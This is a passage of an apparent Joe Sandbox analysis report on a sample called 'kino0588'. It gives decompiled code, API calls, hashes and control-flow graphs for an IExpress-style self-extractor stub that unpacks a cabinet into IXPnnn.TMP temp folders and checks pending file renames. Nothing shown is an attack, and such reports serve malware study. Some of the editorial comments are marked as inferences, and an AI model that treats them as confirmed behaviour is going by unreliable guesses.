					E001944B9(_t27, 0x4ba, 0, 0, 0x10, 0);
					_t37 = 0;
					L10:
					_t12 =  *0x199140; // 0x0
					if(_t12 != 0) {
						FreeResource(_t12);
						 *0x199140 = 0;
					}
					if(_t37 == 0) {
						_t47 =  *0x1991d8; // 0x0
						if(_t47 == 0) {
							E001944B9(0, 0x4f8, 0, 0, 0x10, 0);
						}
					}
					if(( *0x198a38 & 0x00000001) == 0 && ( *0x199a34 & 0x00000001) == 0) {
						SendMessageA( *0x198584, 0xfa1, _t37, 0);
					}
					return _t37;
				}
			}

Instruction addresses (per decompiled line, in listing order): 0x00194fe0 0x00194fe6 0x00194ff9 0x0019500d 0x00195013 0x0019501a 0x00195163 0x00195163 0x00195020 0x00195027 0x00195037 0x00195051 0x00195051 0x00195057 0x0019505e 0x001950a7 0x001950ad 0x001950b4 0x001950e8 0x001950e8 0x001950ee 0x001950ff 0x00195104 0x00195106 0x00000000 0x00195106 0x001950cd 0x001950d3 0x001950da 0x00000000 0x00000000 0x001950dd 0x001950e6 0x00000000 0x00000000 0x00000000 0x00195060 0x00195060 0x00195070 0x00195075 0x00195107 0x00195107 0x0019510e 0x00195111 0x00195117 0x00195117 0x0019511f 0x00195121 0x00195127 0x00195135 0x00195135 0x00195127 0x00195141 0x00195159 0x00195159 0x00000000 0x0019515f

APIs
  • Part of subcall function 0019468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001946A0
  • Part of subcall function 0019468F: SizeofResource.KERNEL32(00000000,00000000,?,00192D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001946A9
  • Part of subcall function 0019468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001946C3
  • Part of subcall function 0019468F: LoadResource.KERNEL32(00000000,00000000,?,00192D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001946CC
  • Part of subcall function 0019468F: LockResource.KERNEL32(00000000,?,00192D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001946D3
  • Part of subcall function 0019468F: memcpy_s.MSVCRT ref: 001946E5
  • Part of subcall function 0019468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001946EF
• FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00194FFE
• LoadResource.KERNEL32(00000000,00000000), ref: 00195006
• LockResource.KERNEL32(00000000), ref: 0019500D
• GetDlgItem.USER32(00000000,00000842), ref: 00195030
• ShowWindow.USER32(00000000), ref: 00195037
• GetDlgItem.USER32(00000841,00000005), ref: 0019504A
• ShowWindow.USER32(00000000), ref: 00195051
• FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00195111
• SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00195159
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                                                    • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                                                    • API String ID: 1305606123-2642027498
                                                                                                                                                                                                                                    • Opcode ID: 2f59a15a2d73347a1e25eb0715c38494c4ba05655aaf3244515191661619fc8a
                                                                                                                                                                                                                                    • Instruction ID: 3551e60668b302b0a6605ba041fdcdf57b0c5c4de91f82b767772848c734768d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f59a15a2d73347a1e25eb0715c38494c4ba05655aaf3244515191661619fc8a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0031D6B07407027FEF215B65AD8AF67379DBB04B59F04003BF902A29A1DBB58C8587A5
                                                                                                                                                                                                                                    Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 95%
			E001953A1(CHAR* __ecx, CHAR* __edx) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t5;
				long _t13;
				int _t14;
				CHAR* _t20;
				int _t29;
				int _t30;
				CHAR* _t32;
				signed int _t33;
				void* _t34;

				_t5 =  *0x198004; // 0x21bd9a3c
				_v8 = _t5 ^ _t33; // stack-cookie setup (global cookie XOR frame pointer), re-checked on return
				_t32 = __edx; // output buffer that receives the directory path
				_t20 = __ecx; // base (temp) directory
				_t29 = 0; // candidate-name counter
				while(1) {
					E0019171E( &_v268, 0x104, "IXP%03d.TMP", _t29); // formats "IXP000.TMP", "IXP001.TMP", ... (see _vsnprintf subcall in APIs)
					_t34 = _t34 + 0x10;
					_t29 = _t29 + 1;
					E00191680(_t32, 0x104, _t20); // likely copies the base path into the output buffer
					E0019658A(_t32, 0x104,  &_v268); // executed -- likely appends the IXPnnn.TMP component
					RemoveDirectoryA(_t32); // executed -- removes a stale, empty directory of that name
					_t13 = GetFileAttributesA(_t32); // executed
					if(_t13 == 0xffffffff) { // INVALID_FILE_ATTRIBUTES: the name is free
						break;
					}
					if(_t29 < 0x190) { // up to 400 candidate names
						continue;
					}
					L3: // fallback: let GetTempFileNameA pick a unique name, then turn it into a directory
					_t30 = 0;
					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
						_t30 = 1;
						DeleteFileA(_t32);
						CreateDirectoryA(_t32, 0);
					}
					L5:
					return E00196CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32); // returns the success flag; stack-cookie check
				}
				_t14 = CreateDirectoryA(_t32, 0); // executed
				if(_t14 == 0) {
					goto L3;
				}
				_t30 = 1;
				 *0x198a20 = 1; // global flag: an IXPnnn.TMP directory was created
				goto L5;
			}

Instruction addresses, one per line of the C-code body above (the 36 lines from the first assignment to the final goto), in order; 0x00000000 marks a line with no address of its own:
0x001953ac 0x001953b3 0x001953b9 0x001953bb 0x001953bd 0x001953bf 0x001953d1 0x001953d6 0x001953e0 0x001953e2 0x001953f5 0x001953fb 0x00195402 0x0019540b 0x00000000 0x00000000 0x00195413 0x00000000 0x00000000 0x00195415 0x00195416 0x00195427 0x0019542a 0x0019542b 0x00195434 0x00195434 0x0019543a 0x0019544c 0x0019544c 0x00195452 0x0019545a 0x00000000 0x00000000 0x0019545e 0x0019545f 0x00000000

APIs
• Part of subcall function 0019171E: _vsnprintf.MSVCRT ref: 00191750
• RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 001953FB
• GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00195402
• GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 0019541F
• DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 0019542B
• CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00195434
• CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00195452
Strings
Memory Dump Source
• Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
Similarity
• API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
• String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$IXP$IXP%03d.TMP
• API String ID: 1082909758-3746127100
• Opcode ID: 70441e74ffa81d7068002648c454d56ce7d7a4875c07a4b60d355bf831335bad
• Instruction ID: 92e93fa1db04766bc25783c2da3bbcdc436e5e39aac20e295ee9f373a6f34336
• Opcode Fuzzy Hash: 70441e74ffa81d7068002648c454d56ce7d7a4875c07a4b60d355bf831335bad
• Instruction Fuzzy Hash: D911017170050477DB21AF269C49FAF3A6EEFD2721F440126B646E3590DF748AC687A2
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph (basic blocks as id start-end [calls/APIs], edges as pred->succ; the executed/not-executed colouring of the rendered graph did not survive extraction)
control_flow_graph 478 195467-195484 479 19548a-195490 call 1953a1 478->479 480 19551c-195528 call 191680 478->480 484 195495-195497 479->484 483 19552d-195539 call 1958c8 480->483 493 19553b-195545 CreateDirectoryA 483->493 494 19554d-195552 483->494 486 19549d-1954c0 call 191781 484->486 487 195581-195583 484->487 495 19550c-19551a call 19658a 486->495 496 1954c2-1954d8 GetSystemInfo 486->496 489 19558d-19559d call 196ce0 487->489 498 195577-19557c call 196285 493->498 499 195547 493->499 500 195585-19558b 494->500 501 195554-195557 call 19597d 494->501 495->483 502 1954da-1954dd 496->502 503 1954fe 496->503 498->487 499->494 500->489 509 19555c-19555e 501->509 507 1954df-1954e2 502->507 508 1954f7-1954fc 502->508 510 195503-195507 call 19658a 503->510 513 1954f0-1954f5 507->513 514 1954e4-1954e7 507->514 508->510 509->500 515 195560-195566 509->515 510->495 513->510 514->495 517 1954e9-1954ee 514->517 515->487 518 195568-195575 RemoveDirectoryA 515->518 517->510 518->487
C-Code - Quality: 75%
// Decompiler output as reported by Joe Sandbox; the // comments are editorial.
// Purpose: prepare the extraction directory for the self-extractor stub in the
// global path buffer at 0x1991e4 (0x104 = MAX_PATH). The IXP%03d.TMP naming in
// the API list above is the Microsoft IExpress/wextract convention.
E00195467(CHAR* __ecx, void* __edx, char* _a4) {
	signed int _v8;
	char _v268;
	struct _SYSTEM_INFO _v304;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t10;
	void* _t13;
	intOrPtr _t14;
	void* _t16;
	void* _t20;
	signed int _t26;
	void* _t28;
	void* _t29;
	CHAR* _t48;
	signed int _t49;
	intOrPtr _t61;

	_t10 =  *0x198004; // 0x21bd9a3c  -- /GS security cookie
	_v8 = _t10 ^ _t49;  // cookie ^ frame pointer, re-checked by E00196CE0 at return
	_push(__ecx);
	if(__edx == 0) {
		// No new directory requested: work on the existing global path buffer (inferred).
		_t48 = 0x1991e4;
		_t42 = 0x104;
		E00191680(0x1991e4, 0x104);
		L14:
		_t13 = E001958C8(_t48); // executed -- non-zero when the directory is already usable (inferred: CreateDirectoryA only runs on zero)
		if(_t13 != 0) {
			L17:
			_t42 = _a4;
			if(_a4 == 0) {
				L23:
				 *0x199124 = 0;  // clear the stored error code
				_t14 = 1;        // success
				L24:
				return E00196CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48); // stack-cookie check and epilogue
			}
			_t16 = E0019597D(_t48, _t42, 1, 0); // executed -- next step on the directory; body not shown on this page
			if(_t16 != 0) {
				goto L23;
			}
			_t61 =  *0x198a20; // 0x0
			if(_t61 != 0) {
				// Remove the directory only if the flag at 0x198a20 says this code created it (set below).
				 *0x198a20 = 0;
				RemoveDirectoryA(_t48);
			}
			L22:
			_t14 = 0;  // failure
			goto L24;
		}
		if(CreateDirectoryA(_t48, 0) == 0) {
			 *0x199124 = E00196285();  // store the failure code (presumably a GetLastError wrapper)
			goto L22;
		}
		 *0x198a20 = 1;  // remember that we created the directory so it can be removed on failure
		goto L17;
	}
	_t42 =  &_v268;
	_t20 = E001953A1(__ecx,  &_v268); // executed -- previous function: creates a fresh IXPnnn.TMP directory (see its API list above)
	if(_t20 == 0) {
		goto L22;
	}
	_push(__ecx);
	_t48 = 0x1991e4;
	E00191781(0x1991e4, 0x104, __ecx,  &_v268); // build the new path in the global buffer, MAX_PATH bounded (inferred)
	if(( *0x199a34 & 0x00000020) == 0) {  // option flag: append an architecture subdirectory?
		L12:
		_t42 = 0x104;
		E0019658A(_t48, 0x104, 0x191140);  // bounded append of the string at 0x191140 (not shown on this page)
		goto L14;
	}
	GetSystemInfo( &_v304);
	_t26 = _v304.dwOemId & 0x0000ffff;  // low word of the union = wProcessorArchitecture
	if(_t26 == 0) {                     // 0 = PROCESSOR_ARCHITECTURE_INTEL
		_push("i386");
		L11:
		E0019658A(_t48, 0x104);         // append the pushed architecture name
		goto L12;
	}
	_t28 = _t26 - 1;
	if(_t28 == 0) {                     // 1 = PROCESSOR_ARCHITECTURE_MIPS
		_push("mips");
		goto L11;
	}
	_t29 = _t28 - 1;
	if(_t29 == 0) {                     // 2 = PROCESSOR_ARCHITECTURE_ALPHA
		_push("alpha");
		goto L11;
	}
	if(_t29 != 1) {                     // any other value (e.g. 9 = AMD64): no subdirectory
		goto L12;
	}
	_push("ppc");                       // 3 = PROCESSOR_ARCHITECTURE_PPC
	goto L11;
}
Instruction addresses (address gutter of the decompiled function above): 0x00195472, 0x00195479, 0x00195481, 0x00195484, 0x0019551c, 0x00195521, 0x00195528, 0x0019552d, 0x0019552f, 0x00195539, 0x0019554d, 0x0019554d, 0x00195552, 0x00195585, 0x00195585, 0x0019558b, 0x0019558d, 0x0019559d, 0x0019559d, 0x00195557, 0x0019555e, 0x00000000, 0x00000000, 0x00195560, 0x00195566, 0x00195569, 0x0019556f, 0x0019556f, 0x00195581, 0x00195581, 0x00000000, 0x00195581, 0x00195545, 0x0019557c, 0x00000000, 0x0019557c, 0x00195547, 0x00000000, 0x00195547, 0x0019548a, 0x00195490, 0x00195497, 0x00000000, 0x00000000, 0x0019549d, 0x001954ab, 0x001954b4, 0x001954c0, 0x0019550c, 0x00195511, 0x00195515, 0x00000000, 0x00195515, 0x001954c9, 0x001954d6, 0x001954d8, 0x001954fe, 0x00195503, 0x00195507, 0x00000000, 0x00195507, 0x001954da, 0x001954dd, 0x001954f7, 0x00000000, 0x001954f7, 0x001954df, 0x001954e2, 0x001954f0, 0x00000000, 0x001954f0, 0x001954e7, 0x00000000, 0x00000000, 0x001954e9, 0x00000000

APIs
• GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 001954C9
• CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 0019553D
• RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 0019556F
• Part of subcall function 001953A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 001953FB
• Part of subcall function 001953A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00195402
• Part of subcall function 001953A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 0019541F
• Part of subcall function 001953A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 0019542B
• Part of subcall function 001953A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00195434
Strings
Memory Dump Source
• Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
Similarity
• API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
• String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$alpha$i386$mips$ppc
• API String ID: 1979080616-4185119251
• Opcode ID: d3db6ba87cfbac4e157185a31503a2f0950b41540435e91396bf2f411fcec221
• Instruction ID: 806569d0a94373c526c06d621105b65960a9c4ee46c9de75756e42a7681dbbb5
• Opcode Fuzzy Hash: d3db6ba87cfbac4e157185a31503a2f0950b41540435e91396bf2f411fcec221
• Instruction Fuzzy Hash: EB313870B00A016BEF169F399C4457E77ABBB95350B06016BB806F3551DB70CE818796
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 519 19256d-19257d 520 192583-192589 519->520 521 192622-192627 call 1924e0 519->521 523 1925e8-192607 RegOpenKeyExA 520->523 524 19258b 520->524 526 192629-19262f 521->526 528 192609-192620 RegQueryInfoKeyA 523->528 529 1925e3-1925e6 523->529 524->526 527 192591-192595 524->527 527->526 531 19259b-1925ba RegOpenKeyExA 527->531 530 1925d1-1925dd RegCloseKey 528->530 529->526 530->529 531->529 532 1925bc-1925cb RegQueryValueExA 531->532 532->530
C-Code - Quality: 86%
			E0019256D(signed int __ecx) {
				int _v8;
				void* _v12;
				signed int _t13;
				signed int _t19;
				long _t24;
				void* _t26;
				int _t31;
				void* _t34;

				_push(__ecx);
				_push(__ecx);
				_t13 = __ecx & 0x0000ffff;
				_t31 = 0;
				if(_t13 == 0) {
					_t31 = E001924E0(_t26);
				} else {
					_t34 = _t13 - 1;
					if(_t34 == 0) {
						_v8 = 0;
						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                                                                                                                                                                                    							goto L7;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                                                    							goto L6;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						L12:
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                                                    							_v8 = 0;
                                                                                                                                                                                                                                    							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                                                    							if(_t24 == 0) {
                                                                                                                                                                                                                                    								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                                                    								L6:
                                                                                                                                                                                                                                    								asm("sbb eax, eax");
                                                                                                                                                                                                                                    								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                                                    								RegCloseKey(_v12); // executed
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							L7:
                                                                                                                                                                                                                                    							_t31 = _v8;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t31;
                                                                                                                                                                                                                                    				goto L12;
                                                                                                                                                                                                                                    			}
Instruction addresses (per-line address column of the decompiled listing above): 0x00192572 0x00192573 0x00192575 0x00192578 0x0019257d 0x00192627 0x00192583 0x00192586 0x00192589 0x001925eb 0x00192607 0x00000000 0x00192609 0x0019261a 0x00000000 0x0019261a 0x00000000 0x0019258b 0x0019258b 0x0019259e 0x001925b2 0x001925ba 0x001925cb 0x001925d1 0x001925d6 0x001925da 0x001925dd 0x001925dd 0x001925e3 0x001925e3 0x001925e3 0x0019258b 0x00192589 0x0019262f 0x00000000

APIs
• RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00194096,00194096,?,00191ED3,00000001,00000000,?,?,00194137,?), ref: 001925B2
• RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00194096,?,00191ED3,00000001,00000000,?,?,00194137,?,00194096), ref: 001925CB
• RegCloseKey.KERNELBASE(?,?,00191ED3,00000001,00000000,?,?,00194137,?,00194096), ref: 001925DD
• RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00194096,00194096,?,00191ED3,00000001,00000000,?,?,00194137,?), ref: 001925FF
• RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00194096,00000000,00000000,00000000,00000000,?,00191ED3,00000001,00000000), ref: 0019261A
Strings
• System\CurrentControlSet\Control\Session Manager, xrefs: 001925A8
• System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 001925F5
• PendingFileRenameOperations, xrefs: 001925C3
Memory Dump Source
• Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
Similarity
• API ID: OpenQuery$CloseInfoValue
• String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
• API String ID: 2209512893-559176071
• Opcode ID: a57ef4380cb766129228ef820b8f2ef235832d5f761d4e7d9ff5afc7e23b5dd7
• Instruction ID: fd9d5236b31b0756cf4bfbb231bf3db7699c5f3fd4bb4ed034f1a87839b20427
• Opcode Fuzzy Hash: a57ef4380cb766129228ef820b8f2ef235832d5f761d4e7d9ff5afc7e23b5dd7
• Instruction Fuzzy Hash: 99114F35942228BBEF209B919C09DFBBE7CEF167A1F554056F808E2011DB305E49D6E1
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
• Executed
• Not Executed
control_flow_graph 533 196a60-196a91 call 197155 call 197208 GetStartupInfoW 539 196a93-196aa2 533->539 540 196abc-196abe 539->540 541 196aa4-196aa6 539->541 544 196abf-196ac5 540->544 542 196aa8-196aad 541->542 543 196aaf-196aba Sleep 541->543 542->544 543->539 545 196ad1-196ad7 544->545 546 196ac7-196acf _amsg_exit 544->546 548 196ad9-196ae9 call 196c3f 545->548 549 196b05 545->549 547 196b0b-196b11 546->547 551 196b2e-196b30 547->551 552 196b13-196b24 _initterm 547->552 553 196aee-196af2 548->553 549->547 554 196b3b-196b42 551->554 555 196b32-196b39 551->555 552->551 556 196b44-196b51 call 197060 554->556 557 196b67-196b71 554->557 555->554 556->557 566 196b53-196b65 556->566 560 196b74-196b79 557->560 561 196c39-196c3e call 19724d 558->561 563 196b7b-196b7d 560->563 564 196bc5-196bc8 560->564 569 196b7f-196b81 563->569 570 196b94-196b98 563->570 567 196bca-196bd3 564->567 568 196bd6-196be3 _ismbblead 564->568 566->557 567->568 572 196be9-196bed 568->572 573 196be5-196be6 568->573 569->564 574 196b83-196b85 569->574 575 196b9a-196b9e 570->575 576 196ba0-196ba2 570->576 572->560 579 196c1e-196c25 572->579 573->572 574->570 580 196b87-196b8a 574->580 577 196ba3-196bbc call 192bfb 575->577 576->577 577->579 586 196bbe-196bbf exit 577->586 582 196c32 579->582 583 196c27-196c2d _cexit 579->583 580->570 584 196b8c-196b92 580->584 582->561 583->582 584->574 586->564
C-Code - Quality: 51%
			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t25;
				signed int _t26;
				signed int _t29;
				int _t30;
				signed int _t37;
				signed char _t41;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				signed int _t58;
				signed int _t59;
				intOrPtr* _t60;
				void* _t62;
				void* _t67;
				void* _t68;

				E00197155();
				_push(0x58);
				_push(0x1972b8);
				E00197208(__ebx, __edi, __esi);
				 *(_t62 - 0x20) = 0;
				GetStartupInfoW(_t62 - 0x68);
				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                                                                                                                                    				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                                                    				_t53 = 0;
                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                    					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                                                    					if(0 == 0) {
                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(0 != _t56) {
                                                                                                                                                                                                                                    						Sleep(0x3e8);
                                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t58 = 1;
                                                                                                                                                                                                                                    						_t53 = 1;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					L7:
                                                                                                                                                                                                                                    					_t67 =  *0x1988b0 - _t58; // 0x2
                                                                                                                                                                                                                                    					if(_t67 != 0) {
                                                                                                                                                                                                                                    						__eflags =  *0x1988b0; // 0x2
                                                                                                                                                                                                                                    						if(__eflags != 0) {
                                                                                                                                                                                                                                    							 *0x1981e4 = _t58;
                                                                                                                                                                                                                                    							goto L13;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							 *0x1988b0 = _t58;
                                                                                                                                                                                                                                    							_t37 = E00196C3F(0x1910b8, 0x1910c4); // executed
                                                                                                                                                                                                                                    							__eflags = _t37;
                                                                                                                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                                                                                                                    								goto L13;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                                                    								_t30 = 0xff;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_push(0x1f);
                                                                                                                                                                                                                                    						L00196FF4();
                                                                                                                                                                                                                                    						L13:
                                                                                                                                                                                                                                    						_t68 =  *0x1988b0 - _t58; // 0x2
                                                                                                                                                                                                                                    						if(_t68 == 0) {
                                                                                                                                                                                                                                    							_push(0x1910b4);
                                                                                                                                                                                                                                    							_push(0x1910ac);
                                                                                                                                                                                                                                    							L00197202();
                                                                                                                                                                                                                                    							 *0x1988b0 = 2;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						if(_t53 == 0) {
                                                                                                                                                                                                                                    							 *0x1988ac = 0;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t71 =  *0x1988b4;
                                                                                                                                                                                                                                    						if( *0x1988b4 != 0 && E00197060(_t71, 0x1988b4) != 0) {
                                                                                                                                                                                                                                    							_t60 =  *0x1988b4; // 0x0
                                                                                                                                                                                                                                    							 *0x19a288(0, 2, 0);
                                                                                                                                                                                                                                    							 *_t60();
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t25 = __imp___acmdln; // 0x74895b9c
                                                                                                                                                                                                                                    						_t59 =  *_t25;
                                                                                                                                                                                                                                    						 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                    						_t54 =  *(_t62 - 0x20);
                                                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                                                    							_t41 =  *_t59;
                                                                                                                                                                                                                                    							if(_t41 > 0x20) {
                                                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							if(_t41 != 0) {
                                                                                                                                                                                                                                    								if(_t54 != 0) {
                                                                                                                                                                                                                                    									goto L32;
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                                                    										_t59 = _t59 + 1;
                                                                                                                                                                                                                                    										 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                    										_t41 =  *_t59;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                                                                                                                                                                                    							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                                                                                                                                                                                    								_t29 = 0xa;
                                                                                                                                                                                                                                    							} else {
